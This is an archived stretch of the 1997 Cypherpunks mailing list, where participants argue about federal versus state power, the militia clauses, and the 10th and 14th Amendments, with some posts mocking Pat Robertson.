	At any rate, the 'War on Drugs' is a bad idea, and the use of
the military as police, domestically or abroad, is a bad idea.  I'm
just not certain which is worse.

- -- 
#include                                /* Sten Drescher */
Unsolicited bulk email will be stored and handled for a US$500/KB fee.
It is by caffeine alone I set my mind in motion, it is by the beans of
Java that thoughts acquire speed, the hands acquire shaking, the
shaking becomes a warning, it is by caffeine alone I set my mind in
motion. -- Carlos Nunes-Ueno, 3/29/95

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQBVAwUBM/9+6/CBWKvC9LiRAQH0dgH9FuLZS4XuLux1vHo40tuozZliIIqjtY4p
ILtZUm1P7MUoCernF2Yrc3YmmByauPKGZIo2dWaZJH+RBy1hZOS5XQ==
=YU0z
-----END PGP SIGNATURE-----






From nobody at REPLAY.COM  Sat Aug 23 17:32:03 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 24 Aug 1997 08:32:03 +0800
Subject: In Defense of Pat Robertson and the "700 Club"
Message-ID: <199708240021.CAA06971@basement.replay.com>



Lynne L. Harrison wrote:
> At 02:08 AM 8/23/97 -0700, you wrote:
> >If Pat Robertson called for the death by stoning of UFO believers, it was
> >almost certainly rhetorical hyperbole, like Rush Limbaugh's suggestions of
> >what ought to be done to lesbians.
> 
> The Anti-UFO movement has replaced (or is along side of) the
> anti-evolutionary movement.  It is Robertson's and his ilk's belief that
> UFO's are anti-Christian, i.e., Satan's plot to disprove biblical teachings
> - specifically, if there is life on other worlds, then the Bible is
> incorrect in that man was created in God's image since Vulcans, Klingons,
> and whom/whatever would also have to be added as being created in God's image.

  My Bible not only has references to the Vulcans and Klingons, but it
is also signed with Jesus's PGP key, which is verified with Kent
Crispin's
PGP signature (dated Dec. 17, 2041).

Sincerely,
  Pigs Fly






From whgiii at amaranth.com  Sat Aug 23 17:38:14 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 08:38:14 +0800
Subject: Inside the Cypherpunks Cult (fwd)
In-Reply-To: 
Message-ID: <199708240037.TAA08487@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/23/97 
   at 07:23 PM, Firebeard  said:

>>Mark M writes:

>> The U.S. Constitution explicitly states in Article I, Section 8,
>>that the militia may be called forth (by the federal government) to
>>enforce federal law.  The army and other military forces, however,
>>were not given this power

>But they were not explicitly denied it, either.


Well there are two opposing camps on the Constitution.

On one side you have the Libertarian view that the Constitution is a
limiting document. The Federal government only has the power that is
explicitly granted and no more.

On the other side we have the view you have presented that unless
explicitly denied the Federal Government can do anything it pleases.

Anyone who has studied the writings of our Founding Fathers can clearly
see that they intended for the Constitution to be a limiting document. The
States had just finished fighting a long war against an oppressive,
distant centralized government had had no intentions of creating another
one in its place.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/90nI9Co1n+aLhhAQFqPAP/dJLzpe2H5X7d1VEemxERLrduj+8/r8vd
5UUlNOTR2e3NxEzAPw5RY/L09HS5w5aKlrdhUNtyWtsDt+qzPs172NMXScXlw8BO
BhEcZpT7XtyTs4yHnp9B7hISb3YdGADl4oL5xw/Ljw0Uq7ivKwF6iqBvAUnbMymn
fZIFU0xMLSM=
=dXM5
-----END PGP SIGNATURE-----






From ravage at ssz.com  Sat Aug 23 17:43:48 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 08:43:48 +0800
Subject: Inside the Cypherpunks Cult (fwd)
Message-ID: <199708240042.TAA27285@einstein.ssz.com>



Forwarded message:

> Subject: Re: Inside the Cypherpunks Cult (fwd)
> From: Firebeard 
> Date: 23 Aug 1997 19:23:07 -0500

> 	It is?  It seems to me that military force is military force,
> regardless of what uniforms it's dressed in. 

It isn't the uniform, its the paycheck and who gives the orders that
determines the difference. Militia's get their money and their orders from
the states and are loaned to the federal government.

The relevant sections from the Constitution:


	To raise and support Armies, but no Appropriation of Money to 
Use shall be for a longer Term than two Years; 

[Note that there is NO proviso for paying for the militia's]

	To provide for calling forth the Militia to execute the Laws of 
the Union, suppress Insurrections and repel Invasions; 

[This seems to imply that it is not the Army who is charged with protecting
the soil of America from foreign invaders]

	To provide for organizing, arming, and disciplining the Militia, 
and for governing such Part of them as may be employed in the Service of 
the United States, reserving to the States respectively, the Appointment 
of the Officers, and the authority of training and Militia according to 
the discipline prescribed by Congress; 

[Hey, I just realized that the above section forces the federal government
to provide militia's with weapons, 'arming']

	A well regulated Militia, being necessary to the security of a 
free State, the right of the people to keep and bear arms, shall not be 
infringed. 

 
Your chances of being shot in Texas, like the kid in the valley, are much
lower with the NJNG than the US Army, mainly because there ain't no way they
are going to get into this state without a fight with the TxNG. I seriously
doubt that the kid would be dead today if he had encountered Texas residents
on boarder patrol.

> 	But they were not explicitly denied it, either.

Yes, they are. Read the 10th. Unless explicity given a duty the federal
government is prohibited from expanding their powers.

> 	Agreed.  Has anyone ever attempted to sue the US Army as being
> unconstitutional, given the prohibition of a standing army?

The prohibition is not on a standing army but rather on monetary and
contractual committments that extend past the Constitutionaly imposed 2
year limit. There is *NO* explicit prohibition on a standing army, simply
that their activities can't be funded for more than 2 years at a time.

As far as I have been able to determine nobody has ever brought such a case.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From enoch at zipcon.net  Sat Aug 23 17:44:27 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sun, 24 Aug 1997 08:44:27 +0800
Subject: Pat is NOT a Cypherpunk
Message-ID: <19970824003708.19482.qmail@zipcon.net>



Tim wrote:

 > If Pat Robertson called for the death by stoning of UFO
 > believers, it was almost certainly rhetorical hyperbole,
 > like Rush Limbaugh's suggestions of what ought to be done to
 > lesbians.

Oh piffle.  Pat believes in a Heaven filled with God, angels,
demons, and various other nonsensical beings, and an earth where
we have all been sent to be punished after the Fall.

Pat is threatened by a Universe with stars and galaxies in place
of Heavenly Hosts, and responds by suggesting the killing of
Heretics.

This is a lot different than Rush or Howard Stern doing a few
jokes about Lesbians.

Pat is afraid of Government Approved Crypto because he thinks it
is the Mark of the Beast, which will be stamped on his forehead
to prevent him from buying or selling without the approval of the
anti-Christ, who will rule earth after Pat and his friends have
risen into the air with the rest of the true believers.

Pat's reasons for coicidentally supporting a few of our agenda
items are so far removed from our reasons for supporting them,
that any suggestion he is our friend borders on the absurd.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From ravage at ssz.com  Sat Aug 23 18:03:44 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 09:03:44 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240101.UAA27366@einstein.ssz.com>



Forwarded message:

> Date: Sat, 23 Aug 1997 17:13:09 -0700
> From: Tim May 
> Subject: Reproductive Rights and State Benefits

> There's a landmine here, of course. Namely, the issue of whether states may
> impose restrictions which are "unconstitutional." To some states rights
> folks, as I assume Jim Choate may be, the answer is often "of course." To
> some libertarians, the answer is often "of course not." A good example to
> consider is "free speech." The First Amendment talks about Congress shall
> make no law...does this mean California may ban certain books, restrict
> certain religions, or impose censorship on the press?

If permitted by the California Constituion absolutely. It's called freedom
of expression, a weird sort of extension to the pursuit of life, liberty,
and happiness. If the citizens don't like it they can elect another
representative to change the law next time around. The right to liberty
implies the right to give it away.

For a democracy to work the group of people making the laws must be
relatively small, otherwise we see the sorts of abuses we currently have
because we have lost respect for others (ie another state) to decide their
fate indipendant of our own.

I am not an advocate of federal or state rights, and most definitely NOT
any sort of Libertarian. I am a strict Constitutionalist and believe that
if the federal government wants to take on a new job not explicity assigned
in the Constitition they MUST pass an amendment per the method detailed in
the Constitution.

Prior to the 14th (which only forces privileges and immunities, and I
utterly reject any claim that a right is a privilege) this was exactly the
case. The founding fathers wanted to see a multiplicity of states with a
variety of laws some limited some actions and others not. The idea behind
this is that if a state passes laws that are too restrictive it is possible
to reverse the insult in a reasonable time and if it proves impossible to
change it (say because of massive public support) then they can move to a
state where such activity is allowed, thus robbing the state of the taxes
and other benefits it derives from such residents. The idea is that if the
states are given a level of equality with the federal government there will
be a moderating effect on tryanny at all levels.

> (Most folks would say "Of course not." But on what basis can individual
> states and municipalities override the Second Amendment?)

Read the 10th. The 2nd. does NOT limit a states right to regulate such
activity.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From lharrison at mhv.net  Sat Aug 23 18:03:50 1997
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Sun, 24 Aug 1997 09:03:50 +0800
Subject: Pat is NOT a Cypherpunk
In-Reply-To: <19970824003708.19482.qmail@zipcon.net>
Message-ID: <3.0.3.32.19970823205946.00703dac@pop.mhv.net>



Amen! (Sorry, couldn't help myself - the devil made me do it.)


At 05:37 PM 8/23/97 -0700, Mike Duvos wrote:
>
>Tim wrote:
>
> > If Pat Robertson called for the death by stoning of UFO
> > believers, it was almost certainly rhetorical hyperbole,
> > like Rush Limbaugh's suggestions of what ought to be done to
> > lesbians.
>
>Oh piffle.  Pat believes in a Heaven filled with God, angels,
>demons, and various other nonsensical beings, and an earth where
>we have all been sent to be punished after the Fall.
>
>Pat is threatened by a Universe with stars and galaxies in place
>of Heavenly Hosts, and responds by suggesting the killing of
>Heretics.
>
>This is a lot different than Rush or Howard Stern doing a few
>jokes about Lesbians.
>
>Pat is afraid of Government Approved Crypto because he thinks it
>is the Mark of the Beast, which will be stamped on his forehead
>to prevent him from buying or selling without the approval of the
>anti-Christ, who will rule earth after Pat and his friends have
>risen into the air with the rest of the true believers.
>
>Pat's reasons for coicidentally supporting a few of our agenda
>items are so far removed from our reasons for supporting them,
>that any suggestion he is our friend borders on the absurd.






From whgiii at amaranth.com  Sat Aug 23 18:25:27 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 09:25:27 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240101.UAA27366@einstein.ssz.com>
Message-ID: <199708240124.UAA08967@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708240101.UAA27366 at einstein.ssz.com>, on 08/23/97 
   at 08:01 PM, Jim Choate  said:

>> There's a landmine here, of course. Namely, the issue of whether states may
>> impose restrictions which are "unconstitutional." To some states rights
>> folks, as I assume Jim Choate may be, the answer is often "of course." To
>> some libertarians, the answer is often "of course not." A good example to
>> consider is "free speech." The First Amendment talks about Congress shall
>> make no law...does this mean California may ban certain books, restrict
>> certain religions, or impose censorship on the press?

>If permitted by the California Constituion absolutely. It's called
>freedom of expression, a weird sort of extension to the pursuit of life,
>liberty, and happiness. If the citizens don't like it they can elect
>another representative to change the law next time around. The right to
>liberty implies the right to give it away.

Well yes and no. Just because you are willing to give you liberty away
does not mean that you have the right to give my liberty away. That's why
the Bill of Rights pre-empts any legislation done by Congress or the
States.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/9/mI9Co1n+aLhhAQFIhQP/T1a9ELUBr6E6QiDjQ0t7iQ15cJ9wo72D
PXK3cjEftjNZad+Wp0yGHsMRK5rQfCCFg5DGc99r22b4kV/Sa/55bZKCvnTfL/sm
CQ6ZM+G+6AqP8li2hGAZmoEP+/GGWigK0/HD1LilWszca5hCOOWCIuBvvknHMG9U
EFhZPkHjvpk=
=4uDq
-----END PGP SIGNATURE-----






From anon at anon.efga.org  Sat Aug 23 18:27:26 1997
From: anon at anon.efga.org (Anonymous)
Date: Sun, 24 Aug 1997 09:27:26 +0800
Subject: State-ism vs. FederalismRe: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: 



Jim Choate wrote:
> > From: Firebeard 
> >       Then what do the words "are reserved to the States
> > respectively" mean?  To me, it's explicitly stating that the States
> > have powers that the feds do (or should) not.

> They mean it isn't something the federal government has any interest or say
> in constitutionaly. It does not imply that those powers are granted at the
> behest of the feds but rather clearly fall outside of their jurisdiction.

 I agree.
 The States should have the right to declare the word "freedom" an
obscenity. The federal government should not.
 The States should have the right to legalize rape. The federal
government should not.
 The States should have the right to require the citizens to commit
suicide at the age of 40. The federal government should not.

  I'm glad that I could clear this up for everyone. No need to thank me.

The Statist







From mnorton at cavern.uark.edu  Sat Aug 23 18:27:41 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 24 Aug 1997 09:27:41 +0800
Subject: Inside the Cypherpunks Cult (fwd)
In-Reply-To: 
Message-ID: 



MacArthur, whose aide was Eisenhower.
MacN

> U.S. troops (regular army, not state Guard units) being used within the
> U.S. against U.S. citizens was the action by Hoover against the
> strikers/rioters and "Hooverville" residents in D.C., circa 1930. Hoover
> sent in Army troops, led by either Gen. Pershing, as I recall (and maybe
> Patton and/or Eisenhower...my CD-ROM encyclopedia is not handy, and a Web
> search on some of the terms didn't quickly show any hits of direct
> relevance, and I don't have the time to do more searches).







From ravage at ssz.com  Sat Aug 23 18:36:10 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 09:36:10 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240135.UAA27615@einstein.ssz.com>



Forwarded message:

> From: "William H. Geiger III" 
> Date: Sat, 23 Aug 97 20:10:12 -0400
> Subject: Re: Reproductive Rights and State Benefits (fwd)

> Well yes and no. Just because you are willing to give you liberty away
> does not mean that you have the right to give my liberty away.

Which is why we implimented a representative democracy in the first place.

> That's why
> the Bill of Rights pre-empts any legislation done by Congress or the
> States.

It does? You are without a doubt reading a different Constitution and Bill of
Rights than the one that I have. If you are making allusion to the 14th,
it only extends to privileges and immunities.

 
			       ARTICLE XIV. 
 
Section 1.  All persons born or naturalized in the United States, and 
subject to the jurisdiction thereof, are citizens of the United States 
and of the State wherein they reside.  No State shall make or enforce 
any law which shall abridge the privileges or immunities of citizens 
of the United States; nor shall any State deprive any person of life, 
liberty, or property, without due process of law; nor deny to any person 
within its jurisdiction the equal protection of the laws. 
 
Section 2 to Section 5 deleted


So you equate your right to religion as a immunity or a privilige? Me
I take it as a right, something outside the legal purvue of the federal
government. An immunity or privilige is something that can be taken away by
the body granting it. Since the Constitution is a mandate from the people
it follows clearly that the only body that can change that mandate is the
people. If the state I live in has a constitution that allows it that is
between me and my state and none of you or your states or the federal
governments business.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From mnorton at cavern.uark.edu  Sat Aug 23 18:37:43 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sun, 24 Aug 1997 09:37:43 +0800
Subject: Reproductive Rights and State Benefits
In-Reply-To: 
Message-ID: 



On Sat, 23 Aug 1997, Tim May wrote:
> 
> There's a landmine here, of course. Namely, the issue of whether states may
> impose restrictions which are "unconstitutional." To some states rights
> folks, as I assume Jim Choate may be, the answer is often "of course." To
> some libertarians, the answer is often "of course not." A good example to
> consider is "free speech." The First Amendment talks about Congress shall
> make no law...does this mean California may ban certain books, restrict
> certain religions, or impose censorship on the press?
> 
> (Most folks would say "Of course not." But on what basis can individual
> states and municipalities override the Second Amendment?)

Most folks would, today, but this was not always a given in our
constitutional jurisprudence.  It's a post-14th Amendment
development, the Bill Of Rights having been understood by the
SCt to have been applied to the states by virtue of the 14th
Amendment's restrictions on state governments.  It's never 
been an impeccable logic, but it seems to get to the right
result.  For most folks, anyway:)
MacN






From whgiii at amaranth.com  Sat Aug 23 19:43:57 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 10:43:57 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240135.UAA27615@einstein.ssz.com>
Message-ID: <199708240241.VAA09743@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708240135.UAA27615 at einstein.ssz.com>, on 08/23/97 
   at 08:35 PM, Jim Choate  said:

>Forwarded message:

>> From: "William H. Geiger III" 
>> Date: Sat, 23 Aug 97 20:10:12 -0400
>> Subject: Re: Reproductive Rights and State Benefits (fwd)

>> Well yes and no. Just because you are willing to give you liberty away
>> does not mean that you have the right to give my liberty away.

>Which is why we implimented a representative democracy in the first
>place.

>> That's why
>> the Bill of Rights pre-empts any legislation done by Congress or the
>> States.

>It does? You are without a doubt reading a different Constitution and
>Bill of Rights than the one that I have. If you are making allusion to
>the 14th, it only extends to privileges and immunities.

> 
>			       ARTICLE XIV. 
> 
>Section 1.  All persons born or naturalized in the United States, and 
>subject to the jurisdiction thereof, are citizens of the United States 
>and of the State wherein they reside.  No State shall make or enforce 
>any law which shall abridge the privileges or immunities of citizens  of
>the United States; nor shall any State deprive any person of life, 
>liberty, or property, without due process of law; nor deny to any person 
>within its jurisdiction the equal protection of the laws. 
> 
>Section 2 to Section 5 deleted


>So you equate your right to religion as a immunity or a privilige? Me I
>take it as a right, something outside the legal purvue of the federal
>government. An immunity or privilige is something that can be taken away
>by the body granting it. Since the Constitution is a mandate from the
>people it follows clearly that the only body that can change that mandate
>is the people. If the state I live in has a constitution that allows it
>that is between me and my state and none of you or your states or the
>federal governments business.


Well you are complicating the issue by assuming that we are in two
different states. If you and I are citizens of the same State you do not
have the right to deny me my rights protected under the Constitution of
the United States of America regardless wether you are in the majority
view or not. Of cource the laws of one State do not have power over
another State.

I do not consider the Bill of Rights as giving me "privileges" but giving
me immunity from any government restricting those rights.


Article. IV.

Section. 2.

Clause 1:  The Citizens of each State shall be entitled to
all Privileges and Immunities of Citizens in the several States. 


Section. 4. The United States shall guarantee to every
State in this Union a Republican Form of Government, and shall protect
each of them against Invasion; and on Application of the
Legislature, or of the Executive (when the Legislature cannot be convened)
against domestic Violence. 


Article. VI.


Clause 2:  This Constitution, and the Laws of the United States which
shall be made in Pursuance thereof; and all Treaties made, or which shall
be made, under the Authority of the United States, shall be the supreme
Law of the Land; and the Judges in every State shall be bound thereby, any
Thing in the Constitution or Laws of any State to the Contrary
notwithstanding. 


I think that this clause more than any other shows exactly where the
States stand. So long as a law passed by Congress is in accordance with
the Constitution the States are obligated to obey such laws regardless of
the Laws & Constitutions of the States.




- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/+RlI9Co1n+aLhhAQG7KwP/S0oS1WcnvDANORpR6nRmevyDqlxNz2G9
+eInN6zhnR/8wocKDOYfmwN12WPt4/OhK/3nexdthM2RSCG0s7xELBABxKrjmWVU
I3u3/g21Ys/CHMigc9M2beTBZNsCvBjn4e7FzpoRL3D/ZFB2aIMpBMHjcWPSNYaP
KAuzLEUhmRk=
=ytyQ
-----END PGP SIGNATURE-----






From ravage at ssz.com  Sat Aug 23 20:15:12 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 11:15:12 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240314.WAA27973@einstein.ssz.com>



Forwarded message:

> From: "William H. Geiger III" 
> Date: Sat, 23 Aug 97 20:44:10 -0400
> Subject: Re: Reproductive Rights and State Benefits (fwd)

> Well you are complicating the issue by assuming that we are in two
> different states.

No, I am making no such assumption the Constitution however does. Quite
clearly I might add.

> If you and I are citizens of the same State you do not
> have the right to deny me my rights protected under the Constitution of
> the United States of America regardless wether you are in the majority
> view or not.

Which is completely irrelevant since the federal government has no authority
over intra-state disagreements that do not involve some resource that lies
outside the state of residence of the parties involved...

I quote from the Constitution again...

Section 2.  The judicial Power shall extend to all Cases, in Law and Equity, 
arising under this Constitution, the Laws of the United States, and Treaties 
made, or which shall be made, under their Authority; -- to all Cases affecting 
Ambassadors, other public Ministers and Consuls; -- to all Cases of admiralty 
and maritime Jurisdiction; -- to Controversies between two or more States; -- 
between a State and Citizens of another State; -- between Citizens of 
different States; -- between Citizens of the same State claiming Lands under 
Grants of different States; -- and between a State, or the Citizens thereof, 
and foreign States, Citizens or Subjects. 

Section 1.  Full Faith and Credit shall be given in each State to the 
public Acts, Records, and judicial Proceedings of every other State. And 
the Congress may by general Laws prescribe the Manner in which such Acts, 
Records and Proceedings shall be proved, and the Effect thereof. 
 
Section 2.  The Citizens of each State shall be entitled to all Privileges 
and Immunities of Citizens in the several States. 


				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 

 
			       ARTICLE XIV. 
 
Section 1.  All persons born or naturalized in the United States, and 
subject to the jurisdiction thereof, are citizens of the United States 
and of the State wherein they reside.  No State shall make or enforce 
any law which shall abridge the privileges or immunities of citizens 
of the United States; nor shall any State deprive any person of life, 
liberty, or property, without due process of law; nor deny to any person 
within its jurisdiction the equal protection of the laws. 

Section 2 through 5 deleted . 


Would you be so kind as to explain exactly what the 14th brings to the table
that was not already covered in the original document? We didn't need the
14th and still don't. It was, and still is, a political ploy to get people
to willingly (through ignorance) comply with a bunch of schills.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From whgiii at amaranth.com  Sat Aug 23 20:33:52 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 11:33:52 +0800
Subject: Reproductive Rights and State Benefits
In-Reply-To: 
Message-ID: <199708240333.WAA10310@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/23/97 
   at 08:33 PM, Mac Norton  said:

>On Sat, 23 Aug 1997, Tim May wrote:
>> 
>> There's a landmine here, of course. Namely, the issue of whether states may
>> impose restrictions which are "unconstitutional." To some states rights
>> folks, as I assume Jim Choate may be, the answer is often "of course." To
>> some libertarians, the answer is often "of course not." A good example to
>> consider is "free speech." The First Amendment talks about Congress shall
>> make no law...does this mean California may ban certain books, restrict
>> certain religions, or impose censorship on the press?
>> 
>> (Most folks would say "Of course not." But on what basis can individual
>> states and municipalities override the Second Amendment?)

>Most folks would, today, but this was not always a given in our
>constitutional jurisprudence.  It's a post-14th Amendment development,
>the Bill Of Rights having been understood by the SCt to have been applied
>to the states by virtue of the 14th Amendment's restrictions on state
>governments.  It's never  been an impeccable logic, but it seems to get
>to the right result.  For most folks, anyway:)

Well i think that you also have to take into account the political setting
of the times. The Framers of the Constitution were representatives of the
States all of which had 1st Amendment protections in their State
Constitutions. Their concerns were not with the States but with a Federal
Government overriding rights already protected by the States.



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/+dtI9Co1n+aLhhAQG7xAQAosflAz8++IP2u3flpO2H0nQtKCs13A9S
XyoWKjn66iBtB2t4YdVUGxNTSIiA1dr0bB4PQBPq0AWHazfwOXrbDtu5FkevLObx
gcLZv7nJ8nsEmF7ssvrhzjAAKnM/Ip0Qh88m8m0iuXbeCk9NcrAray8FrbaaPu5s
stufv/Nl5uY=
=ecqZ
-----END PGP SIGNATURE-----






From whgiii at amaranth.com  Sat Aug 23 20:41:24 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 24 Aug 1997 11:41:24 +0800
Subject: Reproductive Rights and State Benefits (fwd)
In-Reply-To: <199708240314.WAA27973@einstein.ssz.com>
Message-ID: <199708240340.WAA10399@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708240314.WAA27973 at einstein.ssz.com>, on 08/23/97 
   at 10:14 PM, Jim Choate  said:

>Would you be so kind as to explain exactly what the 14th brings to the
>table that was not already covered in the original document? We didn't
>need the 14th and still don't. It was, and still is, a political ploy to
>get people to willingly (through ignorance) comply with a bunch of
>schills.

Nice try but it was you who brought up the 14th in your original reply to
my message. An intresting debating technique present and argument then
blame your opponent for brining up that argument.

I once again shall quote the Constitution :

Article. VI.


Clause 2:  This Constitution, and the Laws of the United States which
shall be made in Pursuance thereof; and all Treaties made, or which shall
be made, under the Authority of the United States, shall be the supreme
Law of the Land; and the Judges in every State shall be bound thereby, any
Thing in the Constitution or Laws of any State to the Contrary
notwithstanding. 


This trumps any argument you have made on this issue so far.



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/+fUI9Co1n+aLhhAQHrVAP9Fld4K8bT4iBvAtsitqJJR5QhwUpRIwE7
4Yx1yxjLC0Ht18OV9uDt+efXEUd3L/vShARRXXShpWPCcrSy9FpCGVL+mnq4RoA3
R+GFnS6h430dM6oQ6SqQlhd9sstyOsBVvQlc2RVzDdZqiganw0+3TJXeeizfbM+m
wZD58NVuFtg=
=+ZMG
-----END PGP SIGNATURE-----






From ravage at ssz.com  Sat Aug 23 20:47:54 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 11:47:54 +0800
Subject: Reproductive Rights and State Benefits (fwd)
Message-ID: <199708240347.WAA28140@einstein.ssz.com>



Forwarded message:

> From: "William H. Geiger III" 
> Date: Sat, 23 Aug 97 22:00:44 -0400
> Subject: Re: Reproductive Rights and State Benefits

> Well i think that you also have to take into account the political setting
> of the times.

A bunch of people who had just lived through a tryannical foreign rule as
well as a revolutionary war to break that rule. To better understand their
view I will attach the Declaration of Indipendance which is after all the
document that justifies the Constitution (apparently people don't read it
either). The Declaration says why while the Constitution says how...

> The Framers of the Constitution were representatives of the
> States all of which had 1st Amendment protections in their State
> Constitutions. Their concerns were not with the States but with a Federal
> Government overriding rights already protected by the States.

If accepted as fact this provides even less reason for the 14th. As it
clearly does not prevent federal rights over-riding state rights.

 
			       ARTICLE XIV. 
 
Section 1.  All persons born or naturalized in the United States, and 
subject to the jurisdiction thereof, are citizens of the United States 
and of the State wherein they reside.  No State shall make or enforce 
any law which shall abridge the privileges or immunities of citizens 
of the United States; nor shall any State deprive any person of life, 
liberty, or property, without due process of law; nor deny to any person 
within its jurisdiction the equal protection of the laws. 


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|

[Note: this document puts to rest forever the question of how our government
       gets its authority and exactly who answers to who and in the first
       two paragraphs even.]


		    In CONGRESS, July 4, 1776. 
 
		    A   D E C L A R A T I O N 
 
		  By the REPRESENTATIVES of the 
 
